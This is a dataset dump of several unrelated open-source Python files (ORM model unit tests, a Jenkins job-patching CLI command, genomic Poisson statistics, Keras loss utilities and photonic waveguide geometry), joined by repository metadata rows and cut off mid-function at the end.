        print("_+++++++++++++++++++ Models : 2 ) Category ++_")
        print("_+++++++++++++++++++++++++++++++++_")
        print("")
        print("")

    def test_a_2_001_category_insert(self):
        db_drop_and_create_all()
        category1 = Category(name="Cheese")
        category1.insert()
        categories = Category.query().all()
        self.assertEqual(len(categories),1)
        print("Test a_2_1: category insert")

    def test_a_2_002_category_update(self):
        category1 = Category.query().get(1)
        #category1.name = "modified"
        category1.update(name="modified")
        category_1 = Category.query().get(1)
        self.assertEqual(category_1.name,"modified")
        print("Test a_2_2: category update")

    def test_a_2_003_category_delete(self):
        category1 = Category.query().get(1)
        category1.delete()
        categories = Category.query().all()
        self.assertEqual(len(categories),0)
        print("Test a_2_3: category delete")

    def test_a_2_004_populate(self):
        populate_tables()
        categories = Category.query().all()
        self.assertEqual(len(categories),13)
        print("Test a_2_4: Populate Tables")

    def test_a_2_005_category_values(self):
        # Root category (no parent) and a nested one (parent chain).
        category = Category.query().get(1)
        self.assertEqual(category.id,1)
        self.assertEqual(category.name,"Electronics")
        self.assertEqual(category.parent_id,None)
        self.assertEqual(category.parent,None)
        self.assertEqual(str(category.children),
                         '[{"id": 2, "name": "Camera", "parent_id": 1}]')
        #print(category.products)
        self.assertEqual(json.loads(str(category.products)),
                         [{"category_id": 1, "id": 1, "product_id": 1},
                          {"category_id": 1, "id": 6, "product_id": 2},
                          {"category_id": 1, "id": 11, "product_id": 3}])
        category = Category.query().get(4)
        self.assertEqual(category.id,4)
        self.assertEqual(category.name,"Manual Cameras")
        self.assertEqual(category.parent_id,2)
        self.assertEqual(category.parent,Category.query().get(2))
        #print(category.children)
        self.assertEqual(str(category.children),
                         '[]')
        #print(category.products)
        self.assertEqual(json.loads(str(category.products)),
                         [{"category_id": 4, "id": 4, "product_id": 1},
                          {"category_id": 4, "id": 9, "product_id": 2},
                          {"category_id": 4, "id": 14, "product_id": 3}])
        print("Test a_2_5: category values")

    def test_a_2_006_category_insert_wrong(self):
        categories = Category.query().all()
        old_records_number = len(categories)
        try:
            #This code will not be executed
            #There are missing required parameters
            category = Category()
            category.insert()
            self.assertEqual(True,False)
        except Exception as e:
            self.assertEqual(str(e),"True != False")
        categories = Category.query().all()
        new_records_number = len(categories)
        self.assertEqual(old_records_number,
                         new_records_number)
        print("Test a_2_6: category insert with missing"+
              "required parameters")

    def test_a_2_007_category_delete_wrong(self):
        categories = Category.query().all()
        old_records_number = len(categories)
        try:
            #This code will not be executed
            #There is no category with the number 0
            category1 = Category.query().get(0)
            category1.delete()
            self.assertEqual(True,False)
        except Exception as e:
            self.assertEqual(str(e),"'NoneType' "+
                             "object has no attribute 'delete'")
            #print(str(e))
        categories = Category.query().all()
        new_records_number = len(categories)
        self.assertEqual(old_records_number,
                         new_records_number)
        print("Test a_2_7: category delete mistake, non-existent"+
              "category id")

    def test_a_2_008_category_simple(self):
        category = Category.query().get(1).simple()
        #print(category)
        self.assertEqual(category,{'id': 1, 'name': 'Electronics',
                                   'parent_id': None})
        category = Category.query().get(4).simple()
        #print(category)
        self.assertEqual(category,{'id': 4, 'name':
                                   'Manual Cameras', 'parent_id': 2})
        print("Test a_2_8: category simple")

    def test_a_2_009_category_relationship_order(self):
        # Exercises parent assignment/lookup without asserting.
        category = Category.query().get(1)
        category.parent=None
        category = Category.query().get(4)
        print("Test a_2_9:category relationship")

    def test_a_2_010_category_delete_relationships(self):
        # Deleting a category removes its ProductCategory links but leaves
        # products alone.
        products_before = len(Product.query().all())
        categories_before = len(Category.query().all())
        pc_before = len(ProductCategory.query().all())
        # deleting the category
        category_to_del = Category.query().get(1)
        category_to_del.delete()
        self.assertEqual(len(Product.query().all()),products_before)
        self.assertEqual(len(Category.query().all()),categories_before-1)
        self.assertEqual(len(ProductCategory.query().all()),pc_before-3)
        print("Test a_2_10: category delete relationships")

    def test_a_2_011_category_deep(self):
        # deep() expands children, parent and product links.
        category = Category.query().get(5)
        #print(category.deep())
        self.assertEqual(category.deep(),
                         {'children':
                          [{'id': 6, 'name': 'Sport Cars', 'parent_id': 5},
                           {'id': 7, 'name': 'Electric Cars', 'parent_id': 5},
                           {'id': 8, 'name': 'Tractors', 'parent_id': 5}],
                          'id': 5, 'name': 'Cars', 'parent': None, 'parent_id': None,
                          'products':
                          [{'category_id': 5, 'id': 5, 'product_id': 1},
                           {'category_id': 5, 'id': 10, 'product_id': 2},
                           {'category_id': 5, 'id': 15, 'product_id': 3}]})
        category = Category.query().get(4)
        #print(category.deep())
        self.assertEqual(category.deep(),
                         {'children': [], 'id': 4, 'name': 'Manual Cameras',
                          'parent': {'id': 2, 'name': 'Camera', 'parent_id': None},
                          'parent_id': 2, 'products':
                          [{'category_id': 4, 'id': 4, 'product_id': 1},
                           {'category_id': 4, 'id': 9, 'product_id': 2},
                           {'category_id': 4, 'id': 14, 'product_id': 3}]})
        print("Test a_2_11: category deep")

    def test_a_3_000_pc_intro(self):
        # Banner only: marks the start of the ProductCategory test group.
        print("")
        print("")
        print("_+++++++++++++++++++++++++++++++++_")
        print("_+++++++++++++++++++ Models : 3 ) ProductCategory ++_")
        print("_+++++++++++++++++++++++++++++++++_")
        print("")
        print("")

    def test_a_3_001_pc_insert(self):
        db_drop_and_create_all()
        populate_tables()
        pc1 = ProductCategory(product_id=3,category_id=7)
        pc1.insert()
        pcs = ProductCategory.query().all()
        self.assertEqual(len(pcs),16)
        print("Test a_3_1: pc insert")

    def test_a_3_002_pc_update(self):
        pc1 = ProductCategory.query().get(1)
        #pc1.name = "modified"
        pc1.update(name="modified")
        pc_1 = ProductCategory.query().get(1)
        self.assertEqual(pc_1.name,"modified")
        print("Test a_3_2: pc update")

    def test_a_3_003_pc_delete(self):
        pc1 = ProductCategory.query().get(1)
        pc1.delete()
        pcs = ProductCategory.query().all()
        self.assertEqual(len(pcs),15)
        print("Test a_3_3: pc delete")

    def test_a_3_004_populate(self):
        populate_tables()
        pcs = ProductCategory.query().all()
        self.assertEqual(len(pcs),15)
        print("Test a_3_4: Populate Tables")

    def test_a_3_005_pc_values(self):
        pc = ProductCategory.query().get(1)
        self.assertEqual(pc.id,1)
        self.assertEqual(pc.product_id,1)
        self.assertEqual(pc.category_id,1)
        #self.assertEqual(pc.parent,None)
        #self.assertEqual(str(pc.children),
        #    '[{"id": 2, "name": "Camera", "parent_id": 1}]')
        #print(pc.product.simple())
        self.assertEqual(pc.product.simple(),
                         {'code': 789456611, 'id': 1, 'name': 'Cheese', 'price': 50.4,
                          'quantity': 7.89})
        #print(pc.category.simple())
        self.assertEqual(pc.category.simple(),
                         {'id': 1, 'name': 'Electronics', 'parent_id': None})
        print("Test a_3_5: pc values")

    def test_a_3_006_pc_insert_wrong(self):
        pcs = ProductCategory.query().all()
        old_records_number = len(pcs)
        try:
            #This code will not be executed
            #There are missing required parameters
            pc = ProductCategory()
            pc.insert()
            self.assertEqual(True,False)
        except Exception as e:
            self.assertEqual(str(e),"True != False")
        pcs = ProductCategory.query().all()
        new_records_number = len(pcs)
        self.assertEqual(old_records_number,
                         new_records_number)
        print("Test a_3_6: pc insert with missing"+
              "required parameters")

    def test_a_3_007_pc_delete_wrong(self):
        pcs = ProductCategory.query().all()
        old_records_number = len(pcs)
        try:
            #This code will not be executed
            #There is no pc with the number 0
            pc1 = ProductCategory.query().get(0)
            pc1.delete()
            self.assertEqual(True,False)
        except Exception as e:
            self.assertEqual(str(e),"'NoneType' "+
                             "object has no attribute 'delete'")
            #print(str(e))
        pcs = ProductCategory.query().all()
        new_records_number = len(pcs)
        self.assertEqual(old_records_number,
                         new_records_number)
        print("Test a_3_7: pc delete mistake, non-existent"+
              "pc id")

    def test_a_3_008_pc_simple(self):
        pc = ProductCategory.query().get(1).simple()
        #print(pc)
        self.assertEqual(pc,{'category_id': 1,
                             'id': 1, 'product_id': 1})
        print("Test a_3_8: pc simple")

    def test_a_3_009_pc_relationship_order(self):
        # Placeholder: relationship assertions are disabled.
        pc = ProductCategory.query().get(1)
        #pc.parent=None
        #pc = ProductCategory.query().get(4)
        print("Test a_3_9:pc relationship")

    def test_a_3_010_pc_delete_relationships(self):
        # Deleting a link row touches neither products nor categories.
        products_before = len(Product.query().all())
        categories_before = len(Category.query().all())
        pc_before = len(ProductCategory.query().all())
        # deleting the link
        pc_to_del = ProductCategory.query().get(1)
        pc_to_del.delete()
        self.assertEqual(len(Product.query().all()),products_before)
        self.assertEqual(len(Category.query().all()),categories_before)
        self.assertEqual(len(ProductCategory.query().all()),pc_before-1)
        print("Test a_3_10: pc delete relationships")

    def test_a_3_011_pc_deep(self):
        # deep() expands both ends of the link.
        pc = ProductCategory.query().get(5)
        #print(pc.deep())
        self.assertEqual(pc.deep(),
                         {'category': {'id': 5, 'name': 'Cars', 'parent_id': None},
                          'category_id': 5, 'id': 5, 'product':
                          {'code': 789456611, 'id': 1, 'name': 'Cheese', 'price': 50.4,
                           'quantity': 7.89}, 'product_id': 1})
        print("Test a_3_11: pc deep")
# Make the tests conveniently executable
if __name__ == "__main__":
    unittest.main()
| 28.021119 | 77 | 0.690496 | 3,831 | 26,536 | 4.568781 | 0.061864 | 0.110552 | 0.014398 | 0.021368 | 0.742273 | 0.684454 | 0.603668 | 0.531395 | 0.471691 | 0.437868 | 0 | 0.050464 | 0.134497 | 26,536 | 946 | 78 | 28.05074 | 0.71163 | 0.096096 | 0 | 0.494526 | 0 | 0 | 0.193759 | 0.012307 | 0 | 0 | 0 | 0 | 0.175182 | 1 | 0.109489 | false | 0.025547 | 0.007299 | 0 | 0.122263 | 0.136861 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
418a73ccd36a29573b20675d0e5a6f1331e0f75a | 1,986 | py | Python | jenskipper/cli/patch.py | flupke/jenskipper | bb3de3745142a5b1bf3df40409711ae74fdb07ea | [
"Apache-2.0"
] | 4 | 2016-04-30T12:43:01.000Z | 2016-12-02T17:42:47.000Z | jenskipper/cli/patch.py | Stupeflix/jenskipper | bb3de3745142a5b1bf3df40409711ae74fdb07ea | [
"Apache-2.0"
] | null | null | null | jenskipper/cli/patch.py | Stupeflix/jenskipper | bb3de3745142a5b1bf3df40409711ae74fdb07ea | [
"Apache-2.0"
] | null | null | null | import subprocess
import click
from .. import utils
from .. import exceptions
from .. import jenkins_api
from . import decorators
from . import diff
@click.command()
@decorators.repos_command
@decorators.jobs_command(num_jobs=1)
@decorators.handle_all_errors()
@click.argument('fname', type=click.Path(exists=True, dir_okay=False,
                                         writable=True))
@click.pass_context
def patch(context, jobs_names, base_dir, fname):
    """
    Try to patch FNAME with the diff between local and remote versions of a
    job.

    WARNING: this may not always work and does not take into account the Jinja
    macros. Always check your diffs before committing changes made by this
    command.
    """
    session = jenkins_api.auth(base_dir)

    # Get diff (reverse=True: remote -> local direction so it applies to FNAME)
    job_name = jobs_names[0]
    try:
        diff_lines = diff.get_job_diff(session, base_dir, job_name, {},
                                       reverse=True)
    except exceptions.JobNotFound:
        utils.sechowrap('')
        utils.sechowrap('Unknown job: %s' % job_name, fg='red', bold=True)
        utils.sechowrap('Job is present in the local repository, but not '
                        'on the Jenkins server.', fg='red')
        context.exit(1)

    # Patch output file by feeding the diff to the external `patch` tool
    # via stdin; stdout/stderr are captured for error reporting below.
    patch_proc = subprocess.Popen(['patch', '--no-backup-if-mismatch', fname],
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE,
                                  stdin=subprocess.PIPE)
    # It's important to add a newline at the end of the patch, so patch can
    # distinguish the end of the file
    # NOTE: the local name `patch` shadows this function inside its own body.
    patch = ''.join(diff_lines).encode('utf8') + b'\n'
    patch_stdout, patch_stderr = patch_proc.communicate(patch)
    if patch_proc.returncode != 0:
        click.secho('Patch failed:', fg='red', bold=True)
        click.secho(patch_stdout.strip().decode('utf8'))
        click.secho(patch_stderr.strip().decode('utf8'))
        context.exit(1)
| 35.464286 | 78 | 0.624371 | 253 | 1,986 | 4.790514 | 0.478261 | 0.041254 | 0.037129 | 0.021452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005533 | 0.271903 | 1,986 | 55 | 79 | 36.109091 | 0.832642 | 0.181772 | 0 | 0.054054 | 0 | 0 | 0.096855 | 0.014465 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.027027 | 0.189189 | 0 | 0.216216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
418dbdc2ab0a6e83c7236c8b810a43bb21ee2351 | 2,783 | py | Python | src/mykrobe/stats/stats.py | Phelimb/mykrobe-atlas-cli | 866471d0c2d7030698d37f5c90fd232cafc261d5 | [
"MIT"
] | 1 | 2020-01-10T06:43:22.000Z | 2020-01-10T06:43:22.000Z | src/mykrobe/stats/stats.py | Phelimb/mykrobe-atlas-cli | 866471d0c2d7030698d37f5c90fd232cafc261d5 | [
"MIT"
] | null | null | null | src/mykrobe/stats/stats.py | Phelimb/mykrobe-atlas-cli | 866471d0c2d7030698d37f5c90fd232cafc261d5 | [
"MIT"
] | null | null | null | from math import exp
from math import factorial
from math import log
import logging
logger = logging.getLogger(__name__)
def percent_coverage_from_expected_coverage(coverage):
    """Expected covered fraction of a sequence at a given depth.

    With low coverage we expect a lower fraction of the sequence to be
    covered; the uncovered fraction decays as exp(-coverage).
    """
    uncovered_fraction = exp(-coverage)
    return 1 - uncovered_fraction
def log_lik_probability_of_N_gaps(depth, percent_coverage):
    """Log-likelihood of the observed number of gaps given the depth.

    The observed gap count is derived from `percent_coverage` over a fixed
    length of 32; the expected gap count decays as exp(-depth) * 32.
    """
    length = 32
    covered_fraction = float(percent_coverage) / 100
    observed_gaps = int(round(length - (length * covered_fraction)))
    expected_gaps = exp(-depth) * length
    return log_poisson_prob(expected_gaps, observed_gaps)
def log_poisson_prob(lam, k):
    """Log of the Poisson pmf with mean `lam` evaluated at count `k`."""
    log_pmf = -lam + k * log(lam)
    return log_pmf - log_factorial(k)
def log_factorial(n):
    """Return log(n!) as the running sum log(1) + log(2) + ... + log(n)."""
    assert n >= 0
    return sum(log(i + 1) for i in range(int(n)))
def log_lik_depth(depth, expected_depth):
    """Log-likelihood of observing `depth` under a Poisson model with mean
    `expected_depth`.

    Raises:
        ValueError: if `expected_depth` is not strictly positive (checked
            first), or if `depth` is negative.
    """
    if expected_depth <= 0:
        raise ValueError("Expected depth must be greater than 0")
    if depth < 0:
        raise ValueError("Depth must not be negative")
    return log_poisson_prob(lam=expected_depth, k=depth)
def log_lik_R_S_coverage(observed_alternate_depth,
                         observed_reference_depth,
                         expected_alternate_depth,
                         expected_reference_depth):
    """Joint log-likelihood of alternate and reference depths, each modelled
    as an independent Poisson with its expected depth as mean."""
    alternate_ll = log_poisson_prob(
        lam=expected_alternate_depth,
        k=observed_alternate_depth)
    reference_ll = log_poisson_prob(
        lam=expected_reference_depth,
        k=observed_reference_depth)
    return alternate_ll + reference_ll
def depth_to_expected_kmer_count(depth):
    """Expected k-mer count at a given depth: 32 k-mers per unit of depth,
    plus a small pseudocount so the result is never exactly zero."""
    kmers_per_depth_unit = 32
    pseudocount = 0.01
    return kmers_per_depth_unit * depth + pseudocount
def log_lik_R_S_kmer_count(observed_reference_kmer_count,
                           observed_alternate_kmer_count,
                           expected_reference_depth,
                           expected_alternate_depth):
    """Joint log-likelihood of reference and alternate k-mer counts.

    Expected counts are derived from the expected depths via
    depth_to_expected_kmer_count(); each observed count is then scored with
    an independent Poisson model and the two log terms are summed.
    """
    expected_reference = depth_to_expected_kmer_count(expected_reference_depth)
    expected_alternate = depth_to_expected_kmer_count(expected_alternate_depth)
    reference_ll = log_poisson_prob(
        lam=expected_reference, k=observed_reference_kmer_count)
    alternate_ll = log_poisson_prob(
        lam=expected_alternate, k=observed_alternate_kmer_count)
    return reference_ll + alternate_ll
| 33.939024 | 106 | 0.684513 | 359 | 2,783 | 4.902507 | 0.192201 | 0.102273 | 0.081818 | 0.057955 | 0.488068 | 0.447727 | 0.320455 | 0.217045 | 0.170455 | 0.170455 | 0 | 0.008023 | 0.238591 | 2,783 | 81 | 107 | 34.358025 | 0.822558 | 0.224937 | 0 | 0.113208 | 0 | 0 | 0.029357 | 0 | 0 | 0 | 0 | 0 | 0.018868 | 1 | 0.150943 | false | 0 | 0.075472 | 0.056604 | 0.377358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
418fb24b012a503b2e7384627bb584b231c134f7 | 6,660 | py | Python | keras/utils/losses_utils.py | PJmouraocs/keras | 7a39b6c62d43c25472b2c2476bd2a8983ae4f682 | [
"MIT"
] | 259 | 2016-02-09T09:06:29.000Z | 2021-07-29T05:27:40.000Z | keras/utils/losses_utils.py | PJmouraocs/keras | 7a39b6c62d43c25472b2c2476bd2a8983ae4f682 | [
"MIT"
] | 50 | 2016-02-24T14:46:57.000Z | 2020-01-20T07:34:19.000Z | keras/utils/losses_utils.py | PJmouraocs/keras | 7a39b6c62d43c25472b2c2476bd2a8983ae4f682 | [
"MIT"
] | 94 | 2016-02-17T20:59:27.000Z | 2021-04-19T08:18:16.000Z | """Utilities related to losses."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from .. import backend as K
class Reduction(object):
    """Types of loss reduction.

    Contains the following values:
    * `NONE`: Un-reduced weighted losses with the same shape as input. When this
       reduction type used with built-in Keras training loops like
       `fit`/`evaluate`, the unreduced vector loss is passed to the optimizer but
       the reported loss will be a scalar value.
    * `SUM`: Scalar sum of weighted losses.
    * `SUM_OVER_BATCH_SIZE`: Scalar `SUM` divided by number of elements in losses.
    """

    NONE = 'none'
    SUM = 'sum'
    SUM_OVER_BATCH_SIZE = 'sum_over_batch_size'

    @classmethod
    def all(cls):
        """Return a tuple of every supported reduction key."""
        return (cls.NONE, cls.SUM, cls.SUM_OVER_BATCH_SIZE)

    @classmethod
    def validate(cls, key):
        """Raise ValueError if `key` is not one of the supported reductions."""
        if key in cls.all():
            return
        raise ValueError('Invalid Reduction Key %s.' % key)
def squeeze_or_expand_dimensions(y_pred, y_true=None, sample_weight=None):
    """Squeeze or expand last dimension if needed.

    1. Squeezes last dim of `y_pred` or `y_true` if their rank differs by 1.
    2. Squeezes or expands last dim of `sample_weight` if its rank differs by 1
    from the new rank of `y_pred`.
    If `sample_weight` is scalar, it is kept scalar.

    # Arguments
        y_pred: Predicted values, a `Tensor` of arbitrary dimensions.
        y_true: Optional label `Tensor` whose dimensions match `y_pred`.
        sample_weight: Optional weight scalar or `Tensor` whose dimensions match
            `y_pred`.

    # Returns
        Tuple of `y_pred`, `y_true` and `sample_weight`. Each of them possibly has
        the last dimension squeezed, `sample_weight` could be extended by one
        dimension.
        NOTE: a 2-tuple (y_pred, y_true) is returned when sample_weight is None.
    """
    if y_true is not None:
        y_pred_rank = K.ndim(y_pred)
        y_pred_shape = K.int_shape(y_pred)
        y_true_rank = K.ndim(y_true)
        y_true_shape = K.int_shape(y_true)

        # Only squeeze when the extra trailing dimension is exactly size 1.
        if (y_pred_rank - y_true_rank == 1) and (y_pred_shape[-1] == 1):
            y_pred = K.squeeze(y_pred, -1)
        elif (y_true_rank - y_pred_rank == 1) and (y_true_shape[-1] == 1):
            y_true = K.squeeze(y_true, -1)

    if sample_weight is None:
        return y_pred, y_true

    # Re-read the rank: y_pred may have been squeezed above.
    y_pred_rank = K.ndim(y_pred)
    weights_rank = K.ndim(sample_weight)
    if weights_rank != 0:  # scalar weights are left untouched
        if y_pred_rank == 0 and weights_rank == 1:
            y_pred = K.expand_dims(y_pred, -1)
        elif weights_rank - y_pred_rank == 1:
            sample_weight = K.squeeze(sample_weight, -1)
        elif y_pred_rank - weights_rank == 1:
            sample_weight = K.expand_dims(sample_weight, -1)
    return y_pred, y_true, sample_weight
def _num_elements(losses):
    """Computes the number of elements in `losses` tensor.

    The count is cast to the dtype of `losses` so it can be used directly as
    a divisor in the mean reduction.
    """
    with K.name_scope('num_elements') as scope:
        return K.cast(K.size(losses, name=scope), losses.dtype)
def reduce_weighted_loss(weighted_losses, reduction=Reduction.SUM_OVER_BATCH_SIZE):
    """Reduces the individual weighted loss measurements.

    `NONE` returns the losses unchanged; `SUM` returns their scalar sum;
    `SUM_OVER_BATCH_SIZE` returns the sum divided by the element count.
    """
    if reduction == Reduction.NONE:
        loss = weighted_losses
    else:
        loss = K.sum(weighted_losses)
        if reduction == Reduction.SUM_OVER_BATCH_SIZE:
            loss = loss / _num_elements(weighted_losses)
    return loss
def broadcast_weights(values, sample_weight):
    """Broadcast `sample_weight` to the shape of `values`.

    Trailing dimensions are appended to `sample_weight` until its rank
    matches `values`; size-1 dimensions are then tiled to the corresponding
    size in `values`.

    # Raises
        ValueError: if `sample_weight` has higher rank than `values`, or if
            a dimension differs between the two and is not 1 in
            `sample_weight`.
    """
    # Broadcast weights if possible.
    weights_shape = K.int_shape(sample_weight)
    values_shape = K.int_shape(values)
    if values_shape != weights_shape:
        weights_rank = K.ndim(sample_weight)
        values_rank = K.ndim(values)

        # Raise error if ndim of weights is > values.
        if weights_rank > values_rank:
            raise ValueError(
                'Incompatible shapes: `values` {} vs `sample_weight` {}'.format(
                    values_shape, weights_shape))

        # Expand dim of weights to match ndim of values, if required.
        for i in range(weights_rank, values_rank):
            sample_weight = K.expand_dims(sample_weight, axis=i)

        # int_shape may be None for fully-dynamic tensors; skip static tiling
        # in that case.
        if weights_shape is not None and values_shape is not None:
            for i in range(weights_rank):
                if (weights_shape[i] is not None and
                        values_shape[i] is not None and
                        weights_shape[i] != values_shape[i]):
                    # Cannot be broadcasted.
                    if weights_shape[i] != 1:
                        raise ValueError(
                            'Incompatible shapes: `values` {} vs '
                            '`sample_weight` {}'.format(
                                values_shape, weights_shape))
                    sample_weight = K.repeat_elements(
                        sample_weight, values_shape[i], axis=i)
    return sample_weight
def compute_weighted_loss(losses,
                          sample_weight=None,
                          reduction=Reduction.SUM_OVER_BATCH_SIZE,
                          name=None):
    """Computes the weighted loss.

    # Arguments
        losses: `Tensor` of shape `[batch_size, d1, ... dN]`.
        sample_weight: Optional `Tensor` whose rank is either 0, or the same rank as
            ` losses`, or be broadcastable to `losses`.
        reduction: (Optional) Type of Reduction to apply to loss.
            Default value is `SUM_OVER_BATCH_SIZE`.
        name: Optional name for the op.

    # Raises
        ValueError: If the shape of `sample_weight` is not compatible with `losses`,
            or if `reduction` is not a valid `Reduction` key.

    # Returns
        Weighted loss `Tensor` of the same type as `losses`. If `reduction` is
        `NONE`, this has the same shape as `losses`; otherwise, it is scalar.
    """
    Reduction.validate(reduction)
    if sample_weight is None:
        sample_weight = 1.0
    with K.name_scope(name or 'weighted_loss'):
        # Work in floatx, then cast the result back to the input dtype below.
        input_dtype = K.dtype(losses)
        losses = K.cast(losses, K.floatx())
        sample_weight = K.cast(sample_weight, K.floatx())

        # Update dimensions of `sample_weight` to match with `losses` if possible.
        losses, _, sample_weight = squeeze_or_expand_dimensions(
            losses, None, sample_weight)

        # Broadcast weights if possible.
        sample_weight = broadcast_weights(losses, sample_weight)

        # Apply weights to losses.
        weighted_losses = sample_weight * losses

        # Apply reduction function to the individual weighted losses.
        loss = reduce_weighted_loss(weighted_losses, reduction)
        # Convert the result back to the input type.
        loss = K.cast(loss, input_dtype)
        return loss
| 37.206704 | 84 | 0.633333 | 893 | 6,660 | 4.5028 | 0.19037 | 0.107436 | 0.023875 | 0.031833 | 0.256155 | 0.201442 | 0.067645 | 0.040786 | 0.040786 | 0.040786 | 0 | 0.005237 | 0.283183 | 6,660 | 178 | 85 | 37.41573 | 0.837034 | 0.344144 | 0 | 0.152174 | 0 | 0 | 0.043956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076087 | false | 0 | 0.054348 | 0.01087 | 0.25 | 0.01087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4191ed02b99fe80f0d4118fb2e70bad9e2f6b771 | 18,531 | py | Python | zeropdk/layout/waveguide_rounding.py | lightwave-lab/zeropdk | cc49eb1008c449185cf9dcdbb283ba086ebd8de0 | [
"MIT"
] | 17 | 2019-08-22T15:55:50.000Z | 2022-02-02T20:52:00.000Z | zeropdk/layout/waveguide_rounding.py | lightwave-lab/zeropdk | cc49eb1008c449185cf9dcdbb283ba086ebd8de0 | [
"MIT"
] | 1 | 2020-09-29T00:43:38.000Z | 2020-10-27T07:15:01.000Z | zeropdk/layout/waveguide_rounding.py | lightwave-lab/zeropdk | cc49eb1008c449185cf9dcdbb283ba086ebd8de0 | [
"MIT"
] | 3 | 2019-09-04T07:48:35.000Z | 2021-06-16T09:39:42.000Z | """ Straight waveguide rounding algorithms"""
from functools import lru_cache
from math import atan2, tan, inf
import numpy as np
import klayout.db as kdb
from zeropdk.layout.geometry import rotate, fix_angle, cross_prod
from zeropdk.layout.algorithms.sampling import sample_function
from zeropdk.layout.waveguides import layout_waveguide
def angle_between(v1, v0):
    """Compute angle in radians between v1 and v0.

    Rotation angle from v0 to v1 counter-clockwise, normalized by fix_angle.
    """
    heading_v1 = atan2(v1.y, v1.x)
    heading_v0 = atan2(v0.y, v0.x)
    return fix_angle(heading_v1 - heading_v0)
def project(P, A, B):
    """Projects a point P onto the line defined by points A and B."""
    direction = B - A
    unit = direction / direction.norm()
    # (P - A) * unit is the scalar projection along the line direction
    return A + (P - A) * unit * unit
def bisect(V1, V2):
    """Bisects two vectors V1 and V2; returns a unit vector.

    # from https://math.stackexchange.com/questions/2285965/how-to-find-the-vector-formula-for-the-bisector-of-given-two-vectors
    """
    combined = V1.norm() * V2 + V2.norm() * V1
    return combined / combined.norm()
def intersect(A, eA, B, eB):
    """Computes the intersection of the lines through A along eA and
    through B along eB.

    # from http://mathforum.org/library/drmath/view/62814.html
    """
    assert abs(cross_prod(eA, eB)) > 0, "Vectors must not be parallel"
    scale = cross_prod(B - A, eB) / cross_prod(eA, eB)
    return A + scale * eA
@lru_cache(maxsize=5)
def _min_clearance(angle_rad, radius):
""" Compute the minimum clearance for a tangent arc given an vertex angle."""
try:
return abs(radius / tan(angle_rad / 2))
except ZeroDivisionError:
return inf
def _solve_Z_angle(α1, α2, BC, R):
from math import sin, cos, tan, atan, acos
assert α1 * α2 # they should have the same sign
sign = α1 / abs(α1)
α1, α2 = abs(α1), abs(α2)
αprime = atan(0.5 / tan(α1) + 0.5 / tan(α2))
A = 2 / cos(αprime)
γ = -αprime + acos(1 / A * (1 / sin(α1) + 1 / sin(α2) - BC / R))
return γ * sign
class ClearanceRewind(Exception):
    """Raised by solve_3 when the segment *before* a corner is shorter than
    the clearance the tangent arc needs; the caller backs up one point."""
    pass
class ClearanceForward(Exception):
    """Raised by solve_3 when the segment *after* a corner is shorter than
    the clearance the tangent arc needs; the caller consumes an extra point."""
    pass
class _Arc:
    """Circular arc from P1 to P2 around center C, oriented by `ccw`."""

    def __init__(self, P1, C, P2, ccw):
        from math import isclose
        # both endpoints must be equidistant from the center
        assert isclose(
            (P2 - C).norm(), (P1 - C).norm(), abs_tol=1e-9
        ), "Invalid Arc"  # inconsistent radius
        self.P1 = P1  # first point
        self.C = C  # center
        self.P2 = P2  # second point
        self.ccw = ccw  # True if counter-clockwise

    def get_points(self):
        """Sample the arc into a list of points, ordered P1 -> P2."""
        from math import atan2, pi
        P1, C, P2 = self.P1, self.C, self.P2
        r = (P2 - C).norm()
        theta_start = atan2((P1 - C).y, (P1 - C).x)
        theta_end = atan2((P2 - C).y, (P2 - C).x)
        # Normalize the angular interval so it is swept in increasing order;
        # for clockwise arcs swap ends and reverse the sampled list below.
        if self.ccw:
            theta_end = (theta_end - theta_start) % (2 * pi) + theta_start
        else:
            theta_start = (theta_start - theta_end) % (2 * pi) + theta_end
            theta_start, theta_end = theta_end, theta_start
        arc_function = lambda t: np.array([r * np.cos(t), r * np.sin(t)])
        # in the function below, theta_start must be smaller than theta_end
        t, coords = sample_function(arc_function, [theta_start, theta_end], tol=0.002 / r)

        # This yields a better polygon
        # The idea is to place a point right after the first one, to
        # make sure the arc starts in the right direction
        insert_at = np.argmax(theta_start + 0.001 <= t)
        t = np.insert(t, insert_at, theta_start + 0.001)
        coords = np.insert(coords, insert_at, arc_function(theta_start + 0.001), axis=1)
        insert_at = np.argmax(theta_end - 0.001 <= t)
        coords = np.insert(
            coords, insert_at, arc_function(theta_end - 0.001), axis=1
        )  # finish the waveguide a little bit after

        # create original waveguide polygon prior to clipping and rotation
        dpoints_list = [C + kdb.DPoint(x, y) for x, y in zip(*coords)]
        if not self.ccw:
            dpoints_list = list(reversed(dpoints_list))
        return dpoints_list

    def __repr__(self):
        return "Arc({P1}, {C}, {P2}, {CCW})".format(P1=self.P1, C=self.C, P2=self.P2, CCW=self.ccw)
class _Line:
def __init__(self, P1, P2):
self.P1 = P1
self.P2 = P2
def get_points(self):
